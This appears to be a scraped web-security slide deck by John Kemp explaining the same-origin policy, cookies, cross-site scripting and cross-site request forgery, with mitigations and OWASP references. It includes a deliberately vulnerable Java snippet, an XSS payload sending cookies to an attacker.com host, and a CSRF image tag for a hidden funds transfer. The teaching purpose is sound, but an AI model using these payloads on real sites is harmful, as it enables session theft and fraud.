80 likes | 167 Views
Origins, Cookies and Security – Oh My!. John Kemp, Nokia Mobile Solutions. What is the “Same-Origin Policy”?. That a document or script loaded from one Web origin may not manipulate properties of, or communicate with, a document loaded from another Web origin.
E N D
Origins, Cookies and Security – Oh My! John Kemp, Nokia Mobile Solutions
What is the “Same-Origin Policy”? • That a document or script loaded from one Web origin may not manipulate properties of, or communicate with, a document loaded from another Web origin. • Server-side security enforced by a client (Web browser!) • Scheme, hostand port are considered a unique origin • Doesn’t restrict a document from having HTML elements which call items from other origins (<img…>, <script src…>) • Everyone wants to break it (see <script src>, JSONP, CORS)
Why same-origin policy? • Netscape 2.0 implemented cookies • HTTP Authentication • Cookies created a session state mechanism for HTTP • HTTP authentication created a login session state for HTTP • One site can cause this state to be sent to another site
Problems with same-origin policy • Impersonation of a legitimate user (via cookie, HTTP credentials) • Impersonation of a legitimate site (by Referer HTTP header, for example) Leading to... • Cross-site scripting • Cross-site request forgery • …and generally bad things for the user, victim site
Cross-site scripting • Web app code: (String) page += "〈input name='creditcard' type='TEXT‘ value='" + request.getParameter("CC") + "'〉”; • Attacker changes “CC” value to: '〉〈script〉document.location= 'http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie〈/script〉'. • All your session are belong to us!!!
Cross-site Request Forgery • Victim site has a public state-changing URL: http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243 • Attacker makes a call to that URL inside an innocuous image load: 〈imgsrc="http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#“ width="0" height="0" /〉 • All yr money are belong to us!!!
Some solutions • Never, ever trust a client! • Don’t rely solely on cookies or the Referer HTTP header for authentication (for example, use CSRF tokens) • Validate input supplied by the requesting user/site • Encode input supplied by a requesting user/site • Don’t write your own code (use OWASP ESAPI where possible!)
More attacks, more information • SOP - http://taossa.com/index.php/2007/02/08/same-origin-policy/ • CORS, UMP, XHR - http://www.w3.org/2001/tag/2010/06/01-cross-domain.html • OWASP – http://www.owasp.org • OWASP Top 10 - http://www.owasp.org/index.php/Top_10_2010-Main • OWASP ESAPI - http://owasp-esapi-java.googlecode.com